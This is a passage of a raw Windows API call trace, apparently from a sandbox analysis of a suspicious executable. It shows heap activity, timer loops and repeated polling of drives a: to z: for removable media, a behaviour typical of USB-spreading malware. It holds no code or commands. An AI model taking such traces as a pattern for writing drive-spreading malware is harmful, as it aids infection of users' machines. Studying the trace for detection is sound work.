[0215.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.085] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.085] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.085] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.085] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.086] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.086] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0215.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0215.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0215.087] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0215.087] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.087] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.087] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.088] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.088] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.089] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.089] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.089] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.089] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.089] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.090] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.090] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.090] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.090] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.090] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.091] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.092] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.092] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.092] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.092] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.092] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.093] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.093] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.093] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.093] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.094] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.094] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.096] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.097] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.097] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.097] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.097] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.097] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.097] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.097] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.097] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.098] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.098] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.098] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.098] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.099] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.099] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.099] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.099] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.099] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.100] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.100] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.101] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.102] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.102] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.102] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.102] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.102] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.103] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.103] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.103] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.103] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.103] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.104] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.104] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.104] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.104] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.104] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0215.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.105] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0215.105] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0215.105] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.105] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.106] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.106] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.106] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.106] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.106] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.106] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.107] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.107] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.107] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.107] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.107] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.107] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.108] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.109] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.110] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.110] 